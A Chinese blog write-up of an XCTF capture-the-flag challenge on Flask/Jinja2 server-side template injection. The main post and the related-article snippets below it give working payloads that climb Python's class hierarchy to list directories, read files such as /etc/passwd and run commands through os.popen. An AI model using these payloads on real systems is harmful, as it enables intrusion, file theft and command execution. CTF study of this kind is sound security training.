【XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection

最新推荐文章于 2021-11-26 23:00:56 发布
最新推荐文章于 2021-11-26 23:00:56 发布
阅读量283 收藏 3
点赞数 2
分类专栏: WEB 文章标签: ssti 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/108312030
版权

打开链接
只有一行字
提示这是python模板注入

也就是说可能是jinjia2、djingo、tornado中的一个模板

在这里插入图片描述
这里涉及到flask的ssti漏洞(服务端模板注入)。

简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使
用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。

举个例子

请求:xxxxxx.xxx/{{ 10*10 }}

响应:xxxxx.xxx/{{100}} Not Found!

原理讲解:
https://www.cnblogs.com/tr1ple/p/9415641.html
https://xz.aliyun.com/t/3679#toc-0

ssti:
https://www.cnblogs.com/R3col/p/12746485.html

总结
这道题只用了下边俩方法:

查看文件(ls)

{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].listdir('./')}}这里的./是路径

文件读取:

​ {{''.__class__.__mro__[-1].__subclasses__()[40]('filename').read()}}这里的filename是文件名

Kal1
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3661
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界web进阶Web_python_template_injection
胖虎很忙
10-11 3598
(1)简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令, (2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置; (3)读取passwd信息 {{ [].class.base.subc...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injectionSSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1346
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
XCTF-Web-高手-Web_python_template_injection
1stPeak's Blog
06-21 286
题目 解题 1、题目提示为python模板注入 猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试,说明存在SSTI 3、那么接下来可以使用相关payload进行验证 (1)payload1 查看所有模块 http://111.200.
XCTF---Web_python_template_injection
weixin_45895555的博客
05-28 470
python template injection (对于出学的我来说)python模板注入不熟。所以花了一天的时间看了不少文章,也慢慢了解了Flask/Jinja2.输入后显示 之后输入**{{config.items()}}是可以爆出一些内容的 这里有些内容较深就不细究了,当然没法得到有利信息。之后有偿试爆了一下类(看了文章,师傅说<type ‘file’>**类,它是文件系统访问的关键但是还没找到方法,所以 继续了一篇) ...
攻防世界XCTFWeb_python_template_injection
末初的CSDN博客
03-13 761
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...
攻防世界web进阶Web_python_template_injection
gongjingege的博客
07-23 496
打开链接,提示模板注入(flask的ssti漏洞(服务端模板注入)) //在使用flask/jinja2的模板渲染函数render_template_string的同时,使用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。 随便试试{{3+3}} 被执行,说明有注入点 构造payload,用os模块的popen执行ls打印所有文件 {{[].class.base.subclasses()[71].init.globals[‘os’].popen(“ls”).read()}} 发现了fl4
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6621
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
攻防世界web进阶Web_python_template_injection
qq_45756971的博客
07-16 266
点开题目所给链接:我们通过 {{1+1}} 判断了它存在phthon模块注入:通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。 我们可以借用 os.popen来读取我们想要的flag文件里的信息 构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘
XCTF 攻防世界WEB 高手进阶 shrine(ssti,待补充)
weixin_45844670的博客
09-01 815
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
web python template injection_XCTF-WEB-高手进阶-Web_python_template_injection-笔记
weixin_40003283的博客
12-13 72
Web_python_template_injectiono(╥﹏╥)o从这里开始题目就变得有点诡谲了网上搜索相关教程的确是一知半解,大概参考了如下和最后的WP:http://shaobaobaoer.cn/archives/660/python-flask-jinja-sstihttps://xz.aliyun.com/t/3679#toc-8(这篇讲的特别好)https://blog.csd...
XCTF python-trade
YenKoc的博客
01-15 639
一.查看文件类型 后缀名为pyc,说明是python字节码文件,python和java在编译方式上很像,都是编译兼并解释型,先编译成字节码,在虚拟机上解释成机器代码。 二.反编译 三.写个exp 分析每个字符的acsill值都先异或32,再加,之后base64编码 那么逆向回来的话,先base解码,再减少,再异或,转成字符串。 import base64 correct ='XlNkVmtUI1...
[wp] 攻防世界-i-got-id-200
MercyLin的博客
09-10 3374
点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑: use strict; use warnings; use CGI; my $cgi= CGI->new; if ( $cgi->upload( 'file' ) ) { my $file= $cgi->param( 'file' ); while ( <$file> ) { print "...
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3463
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
pure_color xctf
最新发布
07-16
pure_color xctf 提供了逼真的仿真环境,使得参赛者能够在一个安全的网络环境下进行实时的攻防演练。平台上的题目多样化且具有挑战性,旨在让参赛者将所学的理论知识应用到实际场景中去,并培养解决问题和团队合作的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值